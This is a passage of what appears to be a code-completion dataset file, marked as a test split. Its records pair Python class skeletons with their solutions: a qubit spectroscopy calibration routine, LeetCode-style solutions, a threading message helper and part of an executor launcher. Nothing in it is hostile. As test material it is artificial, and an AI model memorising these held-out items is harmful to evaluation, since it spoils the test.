'AdaptiveQubitSpectroscopy': {'General': {'n_spectroscopies': 1, 'max_iterations': 2\n\nMethod signatures and docstrings:\n- def __init__(self, dev, qubits: List[QuDev_transmon], fluxlines_dict, **kw): Initializes the ParkAndQubitSpectroscopy routine. The fluxes and/or voltages at which the AdaptiveQubitSpectroscopies are run are specified with the settings of SetBiasVoltageAndFluxPulseAssistedReadOut. If no settings are specified there, it is possible to use the 'General' scope of ParkAndQubitSpectroscopy. In this case (i.e., no settings are specified for SetBiasVoltageAndFluxPulseAssistedReadOut), \"flux\" or \"voltage\" can be specified as a keyword argument of ParkAndQubitSpectroscopy. Args: dev (Device): Device that is being measured. qubits (list[QuDev_transmon]): List of qubits that should be measured. fluxlines_dict (dict): fluxlines_dict object for accessing and changing the dac volta\n- def create_routine_template(self): Creates routine template.\n- def post_run(self): Save the results of the routine.", "prompted_full_text": "Implement the Python class `ParkAndQubitSpectroscopy` described below.\n\nClass description:\nAutomaticRoutine that parks a qubit at the specified spot where it performs an AdaptiveQubitSpectroscopy routine to find its ge_freq. The flux and voltage, together with initial and measured values for ge_freq, can be retrieved from the `results` attribute. In the case where the requested parking point is different from the designated one (`qubit.flux_parking()`): 1. The initial qubit frequency will be calculated according to the flux. 2. The measured qubit frequency will not be updated at the end of the routine. Examples:: settings_user = { 'ParkAndQubitSpectroscopy': {'General': { 'flux': '{designated}'}}, 'AdaptiveQubitSpectroscopy': {'General': {'n_spectroscopies': 1, 'max_iterations': 2\n\nMethod signatures and docstrings:\n- def __init__(self, dev, qubits: List[QuDev_transmon], fluxlines_dict, **kw): Initializes the ParkAndQubitSpectroscopy routine. The fluxes and/or voltages at which the AdaptiveQubitSpectroscopies are run are specified with the settings of SetBiasVoltageAndFluxPulseAssistedReadOut. If no settings are specified there, it is possible to use the 'General' scope of ParkAndQubitSpectroscopy. In this case (i.e., no settings are specified for SetBiasVoltageAndFluxPulseAssistedReadOut), \"flux\" or \"voltage\" can be specified as a keyword argument of ParkAndQubitSpectroscopy. Args: dev (Device): Device that is being measured. qubits (list[QuDev_transmon]): List of qubits that should be measured. fluxlines_dict (dict): fluxlines_dict object for accessing and changing the dac volta\n- def create_routine_template(self): Creates routine template.\n- def post_run(self): Save the results of the routine.\n\n<|skeleton|>\nclass ParkAndQubitSpectroscopy:\n \"\"\"AutomaticRoutine that parks a qubit at the specified spot where it performs an AdaptiveQubitSpectroscopy routine to find its ge_freq. The flux and voltage, together with initial and measured values for ge_freq, can be retrieved from the `results` attribute. In the case where the requested parking point is different from the designated one (`qubit.flux_parking()`): 1. The initial qubit frequency will be calculated according to the flux. 2. The measured qubit frequency will not be updated at the end of the routine. Examples:: settings_user = { 'ParkAndQubitSpectroscopy': {'General': { 'flux': '{designated}'}}, 'AdaptiveQubitSpectroscopy': {'General': {'n_spectroscopies': 1, 'max_iterations': 2\"\"\"\n\n def __init__(self, dev, qubits: List[QuDev_transmon], fluxlines_dict, **kw):\n \"\"\"Initializes the ParkAndQubitSpectroscopy routine. The fluxes and/or voltages at which the AdaptiveQubitSpectroscopies are run are specified with the settings of SetBiasVoltageAndFluxPulseAssistedReadOut. If no settings are specified there, it is possible to use the 'General' scope of ParkAndQubitSpectroscopy. In this case (i.e., no settings are specified for SetBiasVoltageAndFluxPulseAssistedReadOut), \"flux\" or \"voltage\" can be specified as a keyword argument of ParkAndQubitSpectroscopy. Args: dev (Device): Device that is being measured. qubits (list[QuDev_transmon]): List of qubits that should be measured. fluxlines_dict (dict): fluxlines_dict object for accessing and changing the dac volta\"\"\"\n <|body_0|>\n\n def create_routine_template(self):\n \"\"\"Creates routine template.\"\"\"\n <|body_1|>\n\n def post_run(self):\n \"\"\"Save the results of the routine.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super().__init__(dev=dev, qubits=qubits, fluxlines_dict=fluxlines_dict, **kw)\n self.fluxlines_dict = fluxlines_dict\n routines_utils.append_DCsources(self)\n self.results: Dict[str, ParkAndQubitSpectroscopyResults] = {}\n for qb in self.qubits:\n flux, voltage = routines_utils.get_qubit_flux_and_voltage(qb=qb, fluxlines_dict=self.fluxlines_dict, flux=self.get_param_value('flux', qubit=qb.name), voltage=self.get_param_value('voltage', qubit=qb.name))\n self.results[qb.name] = ParkAndQubitSpectroscopyResults(**dict(voltage=voltage, flux=flux))\n self.qubits_frequencies = []\n if flux != qb.flux_parking() or not qb.ge_freq():\n transmon_freq_model = routines_utils.get_transmon_freq_model(qb)\n updated_frequency = qb.calculate_frequency(flux=flux, model=transmon_freq_model)\n else:\n updated_frequency = qb.ge_freq()\n if flux != qb.flux_parking():\n self.settings[self.step_label]['General']['update'] = False\n self.results[qb.name].initial_ge_freq = updated_frequency\n self.qubits_frequencies.append(updated_frequency)\n self._DEFAULT_ROUTINE_TEMPLATE = RoutineTemplate([[self.SetBiasVoltageAndFluxPulseAssistedReadOut, 'set_bias_voltage_and_fp_assisted_ro', {}], [UpdateFrequency, 'update_frequency', {'transition': 'ge', 'frequencies': self.qubits_frequencies}], [AdaptiveQubitSpectroscopy, 'adaptive_qubit_spectroscopy', {}]])\n self.final_init(**kw)\n<|end_body_0|>\n\n<|body_start_1|>\n super().create_routine_template()\n for i, step in reversed(list(enumerate(self.routine_template))):\n self.split_step_for_parallel_groups(index=i)\n<|end_body_1|>\n\n<|body_start_2|>\n for qb in self.qubits:\n self.results[qb.name].measured_ge_freq = qb.ge_freq()\n if self.routine is None:\n for qb in self.qubits:\n if qb.flux_parking() != self.results[qb.name].flux:\n log.warning(f'The routine results will not be updated since {qb.name} was not measured at its designated sweet spot')\n self.settings[self.step_label]['General']['update'] = False\n super().post_run()\n<|end_body_2|>\n", "revision_id": "bc6733d774fe31a23f4c7e73e5eb0beed8d30e7d", "skeleton": "<|skeleton|>\nclass ParkAndQubitSpectroscopy:\n \"\"\"AutomaticRoutine that parks a qubit at the specified spot where it performs an AdaptiveQubitSpectroscopy routine to find its ge_freq. The flux and voltage, together with initial and measured values for ge_freq, can be retrieved from the `results` attribute. In the case where the requested parking point is different from the designated one (`qubit.flux_parking()`): 1. The initial qubit frequency will be calculated according to the flux. 2. The measured qubit frequency will not be updated at the end of the routine. Examples:: settings_user = { 'ParkAndQubitSpectroscopy': {'General': { 'flux': '{designated}'}}, 'AdaptiveQubitSpectroscopy': {'General': {'n_spectroscopies': 1, 'max_iterations': 2\"\"\"\n\n def __init__(self, dev, qubits: List[QuDev_transmon], fluxlines_dict, **kw):\n \"\"\"Initializes the ParkAndQubitSpectroscopy routine. The fluxes and/or voltages at which the AdaptiveQubitSpectroscopies are run are specified with the settings of SetBiasVoltageAndFluxPulseAssistedReadOut. If no settings are specified there, it is possible to use the 'General' scope of ParkAndQubitSpectroscopy. In this case (i.e., no settings are specified for SetBiasVoltageAndFluxPulseAssistedReadOut), \"flux\" or \"voltage\" can be specified as a keyword argument of ParkAndQubitSpectroscopy. Args: dev (Device): Device that is being measured. qubits (list[QuDev_transmon]): List of qubits that should be measured. fluxlines_dict (dict): fluxlines_dict object for accessing and changing the dac volta\"\"\"\n <|body_0|>\n\n def create_routine_template(self):\n \"\"\"Creates routine template.\"\"\"\n <|body_1|>\n\n def post_run(self):\n \"\"\"Save the results of the routine.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class ParkAndQubitSpectroscopy:\n \"\"\"AutomaticRoutine that parks a qubit at the specified spot where it performs an AdaptiveQubitSpectroscopy routine to find its ge_freq. The flux and voltage, together with initial and measured values for ge_freq, can be retrieved from the `results` attribute. In the case where the requested parking point is different from the designated one (`qubit.flux_parking()`): 1. The initial qubit frequency will be calculated according to the flux. 2. The measured qubit frequency will not be updated at the end of the routine. Examples:: settings_user = { 'ParkAndQubitSpectroscopy': {'General': { 'flux': '{designated}'}}, 'AdaptiveQubitSpectroscopy': {'General': {'n_spectroscopies': 1, 'max_iterations': 2\"\"\"\n\n def __init__(self, dev, qubits: List[QuDev_transmon], fluxlines_dict, **kw):\n \"\"\"Initializes the ParkAndQubitSpectroscopy routine. The fluxes and/or voltages at which the AdaptiveQubitSpectroscopies are run are specified with the settings of SetBiasVoltageAndFluxPulseAssistedReadOut. If no settings are specified there, it is possible to use the 'General' scope of ParkAndQubitSpectroscopy. In this case (i.e., no settings are specified for SetBiasVoltageAndFluxPulseAssistedReadOut), \"flux\" or \"voltage\" can be specified as a keyword argument of ParkAndQubitSpectroscopy. Args: dev (Device): Device that is being measured. qubits (list[QuDev_transmon]): List of qubits that should be measured. fluxlines_dict (dict): fluxlines_dict object for accessing and changing the dac volta\"\"\"\n super().__init__(dev=dev, qubits=qubits, fluxlines_dict=fluxlines_dict, **kw)\n self.fluxlines_dict = fluxlines_dict\n routines_utils.append_DCsources(self)\n self.results: Dict[str, ParkAndQubitSpectroscopyResults] = {}\n for qb in self.qubits:\n flux, voltage = routines_utils.get_qubit_flux_and_voltage(qb=qb, fluxlines_dict=self.fluxlines_dict, flux=self.get_param_value('flux', qubit=qb.name), voltage=self.get_param_value('voltage', qubit=qb.name))\n self.results[qb.name] = ParkAndQubitSpectroscopyResults(**dict(voltage=voltage, flux=flux))\n self.qubits_frequencies = []\n if flux != qb.flux_parking() or not qb.ge_freq():\n transmon_freq_model = routines_utils.get_transmon_freq_model(qb)\n updated_frequency = qb.calculate_frequency(flux=flux, model=transmon_freq_model)\n else:\n updated_frequency = qb.ge_freq()\n if flux != qb.flux_parking():\n self.settings[self.step_label]['General']['update'] = False\n self.results[qb.name].initial_ge_freq = updated_frequency\n self.qubits_frequencies.append(updated_frequency)\n self._DEFAULT_ROUTINE_TEMPLATE = RoutineTemplate([[self.SetBiasVoltageAndFluxPulseAssistedReadOut, 'set_bias_voltage_and_fp_assisted_ro', {}], [UpdateFrequency, 'update_frequency', {'transition': 'ge', 'frequencies': self.qubits_frequencies}], [AdaptiveQubitSpectroscopy, 'adaptive_qubit_spectroscopy', {}]])\n self.final_init(**kw)\n\n def create_routine_template(self):\n \"\"\"Creates routine template.\"\"\"\n super().create_routine_template()\n for i, step in reversed(list(enumerate(self.routine_template))):\n self.split_step_for_parallel_groups(index=i)\n\n def post_run(self):\n \"\"\"Save the results of the routine.\"\"\"\n for qb in self.qubits:\n self.results[qb.name].measured_ge_freq = qb.ge_freq()\n if self.routine is None:\n for qb in self.qubits:\n if qb.flux_parking() != self.results[qb.name].flux:\n log.warning(f'The routine results will not be updated since {qb.name} was not measured at its designated sweet spot')\n self.settings[self.step_label]['General']['update'] = False\n super().post_run()\n", "source": "the_stack_v2_python_sparse", "source_path": "pycqed/measurement/calibration/automatic_calibration_routines/park_and_qubit_spectroscopy.py", "source_repo": "QudevETH/PycQED_py3", "split": "test", "star_events_count": 8} {"blob_id": "ae3c32b93921c5df08d556c4b36f8d4678ca8993", "bodies": ["self.max_num = maxChoosableInteger\nif (maxChoosableInteger + 1) * maxChoosableInteger / 2 <= desiredTotal or desiredTotal < 0:\n return False\nif maxChoosableInteger >= desiredTotal:\n return True\nself.d = dict()\nreturn self.dfs(desiredTotal, 0)", "if total <= 0:\n return False\nif choose in self.d:\n return self.d[choose]\nfor i in range(1, self.max_num + 1):\n if choose ^ 1 << i < choose:\n continue\n next_choose = choose | 1 << i\n if not self.dfs(total - i, next_choose):\n self.d[choose] = True\n return True\nself.d[choose] = False\nreturn False"], "bodies_text": "<|body_start_0|>\n self.max_num = maxChoosableInteger\n if (maxChoosableInteger + 1) * maxChoosableInteger / 2 <= desiredTotal or desiredTotal < 0:\n return False\n if maxChoosableInteger >= desiredTotal:\n return True\n self.d = dict()\n return self.dfs(desiredTotal, 0)\n<|end_body_0|>\n\n<|body_start_1|>\n if total <= 0:\n return False\n if choose in self.d:\n return self.d[choose]\n for i in range(1, self.max_num + 1):\n if choose ^ 1 << i < choose:\n continue\n next_choose = choose | 1 << i\n if not self.dfs(total - i, next_choose):\n self.d[choose] = True\n return True\n self.d[choose] = False\n return False\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Solution", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Solution:\n\n def canIWin(self, maxChoosableInteger, desiredTotal):\n \"\"\":type maxChoosableInteger: int :type desiredTotal: int :rtype: bool\"\"\"\n <|body_0|>\n\n def dfs(self, total, choose):\n \"\"\"深度搜索 :type total: int :type choose: int\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.max_num = maxChoosableInteger\n if (maxChoosableInteger + 1) * maxChoosableInteger / 2 <= desiredTotal or desiredTotal < 0:\n return False\n if maxChoosableInteger >= desiredTotal:\n return True\n self.d = dict()\n return self.dfs(desiredTotal, 0)\n<|end_body_0|>\n\n<|body_start_1|>\n if total <= 0:\n return False\n if choose in self.d:\n return self.d[choose]\n for i in range(1, self.max_num + 1):\n if choose ^ 1 << i < choose:\n continue\n next_choose = choose | 1 << i\n if not self.dfs(total - i, next_choose):\n self.d[choose] = True\n return True\n self.d[choose] = False\n return False\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000073", "length_bytes": 4497, "license_type": "no_license", "methods": [{"docstring": ":type maxChoosableInteger: int :type desiredTotal: int :rtype: bool", "name": "canIWin", "signature": "def canIWin(self, maxChoosableInteger, desiredTotal)"}, {"docstring": "深度搜索 :type total: int :type choose: int", "name": "dfs", "signature": "def dfs(self, total, choose)"}], "n_methods": 2, "prompt": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def canIWin(self, maxChoosableInteger, desiredTotal): :type maxChoosableInteger: int :type desiredTotal: int :rtype: bool\n- def dfs(self, total, choose): 深度搜索 :type total: int :type choose: int", "prompted_full_text": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def canIWin(self, maxChoosableInteger, desiredTotal): :type maxChoosableInteger: int :type desiredTotal: int :rtype: bool\n- def dfs(self, total, choose): 深度搜索 :type total: int :type choose: int\n\n<|skeleton|>\nclass Solution:\n\n def canIWin(self, maxChoosableInteger, desiredTotal):\n \"\"\":type maxChoosableInteger: int :type desiredTotal: int :rtype: bool\"\"\"\n <|body_0|>\n\n def dfs(self, total, choose):\n \"\"\"深度搜索 :type total: int :type choose: int\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.max_num = maxChoosableInteger\n if (maxChoosableInteger + 1) * maxChoosableInteger / 2 <= desiredTotal or desiredTotal < 0:\n return False\n if maxChoosableInteger >= desiredTotal:\n return True\n self.d = dict()\n return self.dfs(desiredTotal, 0)\n<|end_body_0|>\n\n<|body_start_1|>\n if total <= 0:\n return False\n if choose in self.d:\n return self.d[choose]\n for i in range(1, self.max_num + 1):\n if choose ^ 1 << i < choose:\n continue\n next_choose = choose | 1 << i\n if not self.dfs(total - i, next_choose):\n self.d[choose] = True\n return True\n self.d[choose] = False\n return False\n<|end_body_1|>\n", "revision_id": "f832227c4d0e0b1c0cc326561187004ef24e2a68", "skeleton": "<|skeleton|>\nclass Solution:\n\n def canIWin(self, maxChoosableInteger, desiredTotal):\n \"\"\":type maxChoosableInteger: int :type desiredTotal: int :rtype: bool\"\"\"\n <|body_0|>\n\n def dfs(self, total, choose):\n \"\"\"深度搜索 :type total: int :type choose: int\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Solution:\n def canIWin(self, maxChoosableInteger, desiredTotal):\n \"\"\":type maxChoosableInteger: int :type desiredTotal: int :rtype: bool\"\"\"\n self.max_num = maxChoosableInteger\n if (maxChoosableInteger + 1) * maxChoosableInteger / 2 <= desiredTotal or desiredTotal < 0:\n return False\n if maxChoosableInteger >= desiredTotal:\n return True\n self.d = dict()\n return self.dfs(desiredTotal, 0)\n\n def dfs(self, total, choose):\n \"\"\"深度搜索 :type total: int :type choose: int\"\"\"\n if total <= 0:\n return False\n if choose in self.d:\n return self.d[choose]\n for i in range(1, self.max_num + 1):\n if choose ^ 1 << i < choose:\n continue\n next_choose = choose | 1 << i\n if not self.dfs(total - i, next_choose):\n self.d[choose] = True\n return True\n self.d[choose] = False\n return False\n", "source": "the_stack_v2_python_sparse", "source_path": "464.py", "source_repo": "Gackle/leetcode_practice", "split": "test", "star_events_count": 0} {"blob_id": "5d5cb8e6f60ffb6771aa1745b38aad782f530a31", "bodies": ["object.__init__(self)\nself.stateLock = threading.Condition() if lock is None else lock\nself.msg = msg", "self.stateLock.acquire()\ntry:\n self.msg = msg\nfinally:\n self.stateLock.notify()\n self.stateLock.release()", "self.stateLock.acquire()\nwhile self.msg is None:\n self.stateLock.wait(timeOut)\nmsg = self.msg\nself.msg = None\nself.stateLock.release()\nreturn msg"], "bodies_text": "<|body_start_0|>\n object.__init__(self)\n self.stateLock = threading.Condition() if lock is None else lock\n self.msg = msg\n<|end_body_0|>\n\n<|body_start_1|>\n self.stateLock.acquire()\n try:\n self.msg = msg\n finally:\n self.stateLock.notify()\n self.stateLock.release()\n<|end_body_1|>\n\n<|body_start_2|>\n self.stateLock.acquire()\n while self.msg is None:\n self.stateLock.wait(timeOut)\n msg = self.msg\n self.msg = None\n self.stateLock.release()\n return msg\n<|end_body_2|>\n", "class_docstring": "Used when a worker thread is told to do lengthy things to a shared resource (say a gui window) and only the last (whenever that may arrive) one matters. Like a 1 deep queue which only contains the last added entry.", "class_name": "LatestMessage", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass LatestMessage:\n \"\"\"Used when a worker thread is told to do lengthy things to a shared resource (say a gui window) and only the last (whenever that may arrive) one matters. Like a 1 deep queue which only contains the last added entry.\"\"\"\n\n def __init__(self, msg=None, lock=None):\n \"\"\"'msg' is an initial value. 'lock' is an optional lock to be used else a new one is allocated.\"\"\"\n <|body_0|>\n\n def setMsg(self, msg):\n \"\"\"place the message and ensure the worker thread is notified is waiting\"\"\"\n <|body_1|>\n\n def getMsg(self, timeOut=None):\n \"\"\"get the latest message else wait for one\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n object.__init__(self)\n self.stateLock = threading.Condition() if lock is None else lock\n self.msg = msg\n<|end_body_0|>\n\n<|body_start_1|>\n self.stateLock.acquire()\n try:\n self.msg = msg\n finally:\n self.stateLock.notify()\n self.stateLock.release()\n<|end_body_1|>\n\n<|body_start_2|>\n self.stateLock.acquire()\n while self.msg is None:\n self.stateLock.wait(timeOut)\n msg = self.msg\n self.msg = None\n self.stateLock.release()\n return msg\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000074", "length_bytes": 4351, "license_type": "no_license", "methods": [{"docstring": "'msg' is an initial value. 'lock' is an optional lock to be used else a new one is allocated.", "name": "__init__", "signature": "def __init__(self, msg=None, lock=None)"}, {"docstring": "place the message and ensure the worker thread is notified is waiting", "name": "setMsg", "signature": "def setMsg(self, msg)"}, {"docstring": "get the latest message else wait for one", "name": "getMsg", "signature": "def getMsg(self, timeOut=None)"}], "n_methods": 3, "prompt": "Implement the Python class `LatestMessage` described below.\n\nClass description:\nUsed when a worker thread is told to do lengthy things to a shared resource (say a gui window) and only the last (whenever that may arrive) one matters. Like a 1 deep queue which only contains the last added entry.\n\nMethod signatures and docstrings:\n- def __init__(self, msg=None, lock=None): 'msg' is an initial value. 'lock' is an optional lock to be used else a new one is allocated.\n- def setMsg(self, msg): place the message and ensure the worker thread is notified is waiting\n- def getMsg(self, timeOut=None): get the latest message else wait for one", "prompted_full_text": "Implement the Python class `LatestMessage` described below.\n\nClass description:\nUsed when a worker thread is told to do lengthy things to a shared resource (say a gui window) and only the last (whenever that may arrive) one matters. Like a 1 deep queue which only contains the last added entry.\n\nMethod signatures and docstrings:\n- def __init__(self, msg=None, lock=None): 'msg' is an initial value. 'lock' is an optional lock to be used else a new one is allocated.\n- def setMsg(self, msg): place the message and ensure the worker thread is notified is waiting\n- def getMsg(self, timeOut=None): get the latest message else wait for one\n\n<|skeleton|>\nclass LatestMessage:\n \"\"\"Used when a worker thread is told to do lengthy things to a shared resource (say a gui window) and only the last (whenever that may arrive) one matters. Like a 1 deep queue which only contains the last added entry.\"\"\"\n\n def __init__(self, msg=None, lock=None):\n \"\"\"'msg' is an initial value. 'lock' is an optional lock to be used else a new one is allocated.\"\"\"\n <|body_0|>\n\n def setMsg(self, msg):\n \"\"\"place the message and ensure the worker thread is notified is waiting\"\"\"\n <|body_1|>\n\n def getMsg(self, timeOut=None):\n \"\"\"get the latest message else wait for one\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n object.__init__(self)\n self.stateLock = threading.Condition() if lock is None else lock\n self.msg = msg\n<|end_body_0|>\n\n<|body_start_1|>\n self.stateLock.acquire()\n try:\n self.msg = msg\n finally:\n self.stateLock.notify()\n self.stateLock.release()\n<|end_body_1|>\n\n<|body_start_2|>\n self.stateLock.acquire()\n while self.msg is None:\n self.stateLock.wait(timeOut)\n msg = self.msg\n self.msg = None\n self.stateLock.release()\n return msg\n<|end_body_2|>\n", "revision_id": "b54f23c6c5f1f19e426ee06c9e9faf9f561ee9a9", "skeleton": "<|skeleton|>\nclass LatestMessage:\n \"\"\"Used when a worker thread is told to do lengthy things to a shared resource (say a gui window) and only the last (whenever that may arrive) one matters. Like a 1 deep queue which only contains the last added entry.\"\"\"\n\n def __init__(self, msg=None, lock=None):\n \"\"\"'msg' is an initial value. 'lock' is an optional lock to be used else a new one is allocated.\"\"\"\n <|body_0|>\n\n def setMsg(self, msg):\n \"\"\"place the message and ensure the worker thread is notified is waiting\"\"\"\n <|body_1|>\n\n def getMsg(self, timeOut=None):\n \"\"\"get the latest message else wait for one\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class LatestMessage:\n \"\"\"Used when a worker thread is told to do lengthy things to a shared resource (say a gui window) and only the last (whenever that may arrive) one matters. Like a 1 deep queue which only contains the last added entry.\"\"\"\n\n def __init__(self, msg=None, lock=None):\n \"\"\"'msg' is an initial value. 'lock' is an optional lock to be used else a new one is allocated.\"\"\"\n object.__init__(self)\n self.stateLock = threading.Condition() if lock is None else lock\n self.msg = msg\n\n def setMsg(self, msg):\n \"\"\"place the message and ensure the worker thread is notified is waiting\"\"\"\n self.stateLock.acquire()\n try:\n self.msg = msg\n finally:\n self.stateLock.notify()\n self.stateLock.release()\n\n def getMsg(self, timeOut=None):\n \"\"\"get the latest message else wait for one\"\"\"\n self.stateLock.acquire()\n while self.msg is None:\n self.stateLock.wait(timeOut)\n msg = self.msg\n self.msg = None\n self.stateLock.release()\n return msg\n", "source": "the_stack_v2_python_sparse", "source_path": "pylib/thread.py", "source_repo": "chyser/bin", "split": "test", "star_events_count": 1} {"blob_id": "fb1200c85ac9ab4177dbb59360d3939337dfb76d", "bodies": ["row_num = len(array)\nfor i in range(row_num):\n col_num = len(array[i])\n for j in range(col_num):\n if array[i][j] == target:\n return True\nreturn False", "row_num = 0\ncol_num = len(array[0]) - 1\nrow_count = len(array)\nwhile row_num < row_count and col_num >= 0:\n val = array[row_num][col_num]\n if val == target:\n return True\n elif val > target:\n col_num -= 1\n else:\n row_num += 1\nreturn False"], "bodies_text": "<|body_start_0|>\n row_num = len(array)\n for i in range(row_num):\n col_num = len(array[i])\n for j in range(col_num):\n if array[i][j] == target:\n return True\n return False\n<|end_body_0|>\n\n<|body_start_1|>\n row_num = 0\n col_num = len(array[0]) - 1\n row_count = len(array)\n while row_num < row_count and col_num >= 0:\n val = array[row_num][col_num]\n if val == target:\n return True\n elif val > target:\n col_num -= 1\n else:\n row_num += 1\n return False\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Solution", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Solution:\n\n def Find_1(self, target, array):\n \"\"\"方法一:常规扫描整个二维数组。时间复杂度为O(n*m) 行数*列数,可视为O(n^2) 没有用到 每行从左到右递增、每列从上到下递增 的特性\"\"\"\n <|body_0|>\n\n def Find_2(self, target, array):\n \"\"\"方法二:利用 每行从左到右递增、每列从上到下递增 的特性,减少扫描、比较次数。时间复杂度为O(n)\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n row_num = len(array)\n for i in range(row_num):\n col_num = len(array[i])\n for j in range(col_num):\n if array[i][j] == target:\n return True\n return False\n<|end_body_0|>\n\n<|body_start_1|>\n row_num = 0\n col_num = len(array[0]) - 1\n row_count = len(array)\n while row_num < row_count and col_num >= 0:\n val = array[row_num][col_num]\n if val == target:\n return True\n elif val > target:\n col_num -= 1\n else:\n row_num += 1\n return False\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000075", "length_bytes": 1457, "license_type": "no_license", "methods": [{"docstring": "方法一:常规扫描整个二维数组。时间复杂度为O(n*m) 行数*列数,可视为O(n^2) 没有用到 每行从左到右递增、每列从上到下递增 的特性", "name": "Find_1", "signature": "def Find_1(self, target, array)"}, {"docstring": "方法二:利用 每行从左到右递增、每列从上到下递增 的特性,减少扫描、比较次数。时间复杂度为O(n)", "name": "Find_2", "signature": "def Find_2(self, target, array)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_006044", "prompt": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def Find_1(self, target, array): 方法一:常规扫描整个二维数组。时间复杂度为O(n*m) 行数*列数,可视为O(n^2) 没有用到 每行从左到右递增、每列从上到下递增 的特性\n- def Find_2(self, target, array): 方法二:利用 每行从左到右递增、每列从上到下递增 的特性,减少扫描、比较次数。时间复杂度为O(n)", "prompted_full_text": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def Find_1(self, target, array): 方法一:常规扫描整个二维数组。时间复杂度为O(n*m) 行数*列数,可视为O(n^2) 没有用到 每行从左到右递增、每列从上到下递增 的特性\n- def Find_2(self, target, array): 方法二:利用 每行从左到右递增、每列从上到下递增 的特性,减少扫描、比较次数。时间复杂度为O(n)\n\n<|skeleton|>\nclass Solution:\n\n def Find_1(self, target, array):\n \"\"\"方法一:常规扫描整个二维数组。时间复杂度为O(n*m) 行数*列数,可视为O(n^2) 没有用到 每行从左到右递增、每列从上到下递增 的特性\"\"\"\n <|body_0|>\n\n def Find_2(self, target, array):\n \"\"\"方法二:利用 每行从左到右递增、每列从上到下递增 的特性,减少扫描、比较次数。时间复杂度为O(n)\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n row_num = len(array)\n for i in range(row_num):\n col_num = len(array[i])\n for j in range(col_num):\n if array[i][j] == target:\n return True\n return False\n<|end_body_0|>\n\n<|body_start_1|>\n row_num = 0\n col_num = len(array[0]) - 1\n row_count = len(array)\n while row_num < row_count and col_num >= 0:\n val = array[row_num][col_num]\n if val == target:\n return True\n elif val > target:\n col_num -= 1\n else:\n row_num += 1\n return False\n<|end_body_1|>\n", "revision_id": "6ee455019ae2d9adeea9fc3876f5da4297320715", "skeleton": "<|skeleton|>\nclass Solution:\n\n def Find_1(self, target, array):\n \"\"\"方法一:常规扫描整个二维数组。时间复杂度为O(n*m) 行数*列数,可视为O(n^2) 没有用到 每行从左到右递增、每列从上到下递增 的特性\"\"\"\n <|body_0|>\n\n def Find_2(self, target, array):\n \"\"\"方法二:利用 每行从左到右递增、每列从上到下递增 的特性,减少扫描、比较次数。时间复杂度为O(n)\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Solution:\n def Find_1(self, target, array):\n \"\"\"方法一:常规扫描整个二维数组。时间复杂度为O(n*m) 行数*列数,可视为O(n^2) 没有用到 每行从左到右递增、每列从上到下递增 的特性\"\"\"\n row_num = len(array)\n for i in range(row_num):\n col_num = len(array[i])\n for j in range(col_num):\n if array[i][j] == target:\n return True\n return False\n\n def Find_2(self, target, array):\n \"\"\"方法二:利用 每行从左到右递增、每列从上到下递增 的特性,减少扫描、比较次数。时间复杂度为O(n)\"\"\"\n row_num = 0\n col_num = len(array[0]) - 1\n row_count = len(array)\n while row_num < row_count and col_num >= 0:\n val = array[row_num][col_num]\n if val == target:\n return True\n elif val > target:\n col_num -= 1\n else:\n row_num += 1\n return False\n", "source": "the_stack_v2_python_sparse", "source_path": "p1_array/a1_Find.py", "source_repo": "atm1992/nowcoder_offer_in_Python27", "split": "test", "star_events_count": 0} {"blob_id": "f5b546f2a15477fab799579cc7dd514f283b001d", "bodies": ["if component_config:\n return False\nreturn isinstance(component_executor_spec, executor_spec.ExecutorClassSpec)", "executor_class_spec = cast(executor_spec.ExecutorClassSpec, self._component_executor_spec)\nif issubclass(executor_class_spec.executor_class, base_beam_executor.BaseBeamExecutor):\n executor_context = base_beam_executor.BaseBeamExecutor.Context(beam_pipeline_args=self._beam_pipeline_args, tmp_dir=os.path.join(self._pipeline_info.pipeline_root, '.temp', ''), unique_id=str(execution_id))\nelse:\n executor_context = base_executor.BaseExecutor.Context(extra_flags=self._beam_pipeline_args, tmp_dir=os.path.join(self._pipeline_info.pipeline_root, '.temp', ''), unique_id=str(execution_id))\nexecutor = executor_class_spec.executor_class(executor_context)\nexecutor.Do(copy.deepcopy(input_dict), output_dict, copy.deepcopy(exec_properties))"], "bodies_text": "<|body_start_0|>\n if component_config:\n return False\n return isinstance(component_executor_spec, 